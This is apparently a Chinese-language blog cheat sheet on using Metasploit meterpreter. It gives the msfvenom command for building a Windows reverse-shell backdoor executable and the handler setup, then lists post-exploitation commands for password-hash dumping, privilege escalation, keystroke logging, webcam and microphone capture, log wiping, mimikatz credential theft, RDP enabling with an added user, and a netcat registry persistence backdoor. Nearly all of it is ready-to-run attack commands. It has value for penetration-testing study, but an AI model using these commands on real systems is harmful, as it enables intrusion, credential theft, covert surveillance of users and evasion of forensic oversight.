meterpreter使用方式
922 字
5 分钟
meterpreter使用方式
meterpreter生成后门Windows可执行文件
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.80.128 lport=9999 -f exe -o demo9999.exelhost//监听地址(攻击者ip)lport//端口启动msfconsole
sudo sumsfconsoleuse exploit/multi/handler设置
set payload windows/x64/meterpreter/reverse_tcpset lhost 192.168.80.128set lport 9999命令
sessions -i 进入会话sessions -k 杀死会话pwd 查看当前目录getuid 查看当前用户信息sysinfo 查看远程主机系统信息execute 在目标主机上执行命令hashdump 获取目标主机用户密码hash信息(只要我们能够获取到目标的用户凭证,那么即使目标修补了漏洞,我们还是可以控制目标)getsystem 提升权限(通过内置的提权组件来尝试获取到系统权限)shell 切换至传统shellbackground 将当前session放入后台kill 关闭进程load 加载meterpreter扩展exit 退出当前shellarp 显示ARP缓存getproxy 显示当前代理配置ifconfig 显示接口ipconfig 显示接口netstat 显示网络连接portfwd 将本地端口转发到远程服务route 查看和修改路由getenv 查看环境变量getprivs 查看权限pgrep 搜索进程ps 查看当前运行进程(主要查看有没有杀软,可以通过在线杀软对比来确定)reboot 重启系统reg 修改注册表help 查看相关的命令migrate 进程迁移(主要是防止当前的会话断开,所以尽快迁移到其他稳定的进程当中去,要注意两点:迁移的进程位数要一致,迁移的权限最好一致)clearev 清除windows中的应用程序日志、系统日志、安全日志文件系统命令
cat 查看文件cd 改变目录checksum 校验文件md5或sha1cp 拷贝文件download 下载文件edit 编辑文件ls 列出文件mkdir 创建文件夹mv 移动文件rm 删除文件rmdir 删除文件夹search 查找文件show_mount 列出所有驱动器upload 上传文件用户设备命令
enumdesktops 列出所有可访问的桌面和窗口getdesktop 获取当前桌面idletime 获取远程系统已运行时间(从上次重新启动开始计算)keyboard_send 发送击键keyscan_dump 转储击键缓冲区keyscan_start 开始捕获击键keyscan_stop 停止捕获击键mouse 发送鼠标事件screenshare 实时观看远程用户的桌面screenshot 截屏setdesktop 更改shell当前桌面uictl 控制用户界面组件record_mic 记录麦克风一定秒数webcam_chat 开始视频聊天webcam_list 列出网络摄像头webcam_snap 从指定网络摄像头拍摄webcam_stream 播放指定网络摄像头的视频流play 在目标系统播放音频
mimikatz抓取密码load mimikatz 加载mimikatz模块help mimikatz 查看帮助wdigest 获取密码开启远程桌面
run vnc 使用vnc连接远程桌面run getgui -e 开启远程桌面run post/windows/manage/enable_rdp 开启远程桌面run post/windows/manage/enable_rdp USERNAME=test PASSWORD=123456 添加用户run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 将3389端口转发到6662收集信息
run post/windows/gather/checkvm #是否虚拟机run post/linux/gather/checkvm #是否虚拟机run post/windows/gather/forensics/enum_drives #查看分区run post/windows/gather/enum_applications #获取安装软件信息run post/windows/gather/dumplinks #获取最近的文件操作run post/windows/gather/enum_ie #获取IE缓存run post/windows/gather/enum_chrome #获取Chrome缓存run post/windows/gather/enum_patches #补丁信息run post/windows/gather/enum_domain #查找域控针对未安装补丁攻击
run post/windows/gather/enum_patches 收集补丁信息攻击:msf > use exploit/windows/local/xxxxmsf > set SESSION 2msf > exploit注册表设置nc后门
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 #上传ncreg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run #枚举run下的keyreg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' #设置键值reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v lltest_nc #查看键值nc -v 192.168.159.144 443 #攻击者连接nc后门支持与分享
如果这篇文章对你有帮助,欢迎分享给更多人或赞助支持!
meterpreter使用方式
https://firefly.cuteleaf.cn/posts/meterpreter使用方式/ 欢迎来到我的博客!这是一则示例公告。
音乐
暂未播放
0:00 0:00
26
4
13
11,974
0 天
0 天前